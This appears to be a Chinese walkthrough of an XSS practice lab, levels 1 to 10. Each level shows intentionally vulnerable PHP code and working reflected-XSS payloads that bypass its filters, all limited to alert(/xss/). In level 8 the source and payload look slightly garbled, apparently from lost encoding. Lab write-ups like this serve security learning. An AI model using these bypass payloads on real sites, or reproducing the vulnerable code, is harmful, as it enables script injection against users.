忘记啥时候下载的练习题,无聊拿出来做做。
打开后随便点一下进入第一关:
第一关
源码:
<body>
<h1 align=center>欢迎来到level1</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
分析:没有做任何过滤
payload为:name=<script>alert(/xss/)</script>
第二关:
源码:
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
分析:有两处输出,第一处在PHP代码块的echo中输出,第二处在表单input中输出,第一处用htmlspeciachars()做了转义,第二处并没有做限制,让payload在第二处起效果就好,有2种方法。
1.不逃逸input标签闭合前边的双引号加个事件触发xss即可:
移动下鼠标即可触发payload为: " onmouseover="alert(/xss/)
点击输入框即可触发payload为: " onclick="alert(/xss/)
点击输入框即可触发payload为: " onfocus="alert(/xss/)
2.逃逸出input标签执行另外的标签触发xss即可:
用<img>标签payload为: "><img src=! onerror="alert(/xss/)">
用<img>标签payload为:"><img src="javascript:alert(/xss/)"> //浏览器可能会过滤这个
用<a>标签payload为: "><a href="javascript:alert(/xss/)">xss</a>
用<a>标签payload为:<a href="" onmouseover="alert(/xss/)">xss</a> // 移动鼠标至框内
payload太多了,大同小异能用就行
第三关:
源码:
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
<center><img src=level3.png></center>
分析:这次它将两个输出点都做了htmlspecialchars()转义,那既然做了转义那么双引号和尖括号就没有效果了,但是单引号在这个函数中如果没做特殊的改动,默认是可以出效果的,而且源码中的value是用单引号,看来是有意让我使用单引号。
payload为:' onmouseover='alert(/xss/) //其他payload省略
第四关:
源码:
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
分析:这里的俩个输出点,一个被转义,另外一个将尖括号替换为空,但是这并不影响啊,按照上两题的套路,虽然不能闭合标签,单照样可以在input标签里边出发xss的。
payload为:" onfocus="alert(/xss/) //鼠标点击输入框出发,其他payload省略
第五关:
源码:
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
分析:貌似还是和前几题差不多只是将<script和on进行了替换但是黑名单过滤没用啊,两种方法都可触发xss,第一种可以直接跳出input标签换个其他标签即可第二种改变下大小写也可以,但是仔细看源代码发现有个strtolower()函数,他会把提交的所有字符转换为小写,那就跳出input标签即可。
payload为:"><a href="javascript:alert(/xss/)">xss</a>
第六关:
源码:
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
分析:代码中它还是进行了关键字过滤,但是没有了strtolow()函数,那么进行大小写绕过即可:
1.在input标签中触发XSS:
payload为:" ONmouseover="alert(/xss/) //等等...
2.跳出input标签触发XSS:
payload为:"><sCript>alert(/xss/)</sCript> //等等...
第七关:
源码:
<?php
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
分析:这道题出题人似乎把上边遇到的缺陷都补充了,但是程序有意的将特殊字符替换成空字符,这样可以采用补充撮合的方法达到XSS攻击效果。
1.在input标签中触发:
payload为:" oonnmouseover="alert(/xss/) //等等...
2.跳出input标签触发:
payload为:"><scscriptript>alert(/xss/)</scscriptript> //等等...
第八关:
源码:
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>
分析:这次代码先是将字符转换为小写,然后过滤特殊字符和双引号,最后又怕有漏网之鱼加了一个转义函数输出,所以按常规方法绕几乎不可能成功,代码处的添加友情链接是突破点,在input框中输入字符提交之后,在友情链接处会载入一个拼接后的a标签,因为javascript被过滤对其进行编码绕过再点击友情链接即可。
payload为:javascript:alert(/xss/)
第九关:
源码:
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
}
else
{
echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
分析:这次在上一题的基础上加入了strpos()函数,查找如果url中找到'http'那么会返回找到位置的位数,自然不会返回0也就不会等于false,那么就可以绕过限制了,但是为什么会这么做呢?回想了下,应该是让输入框必须要输入合法的URL即带有http的字符串,那么可以向输入框加进去就可以绕过了。
payload为:javascript:alert(/xss/)//http://
第十关:
源码:
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
分析:这道题有俩个输出的地方,第一个被实体化过滤,第二个是隐藏表单的"t_sort"参数即'$str33',过滤了尖括号,那么就在input标签中触发xss即可,可以用onmouseover或者是onclick,需要将隐藏表单显示出来触发:
payload为:url后加 &t_sort=xss" onmouseover=alert(/xss/) type="text"
payload为:url后加 &t_sort=xss" onclick=alert(/xss/) type="text"
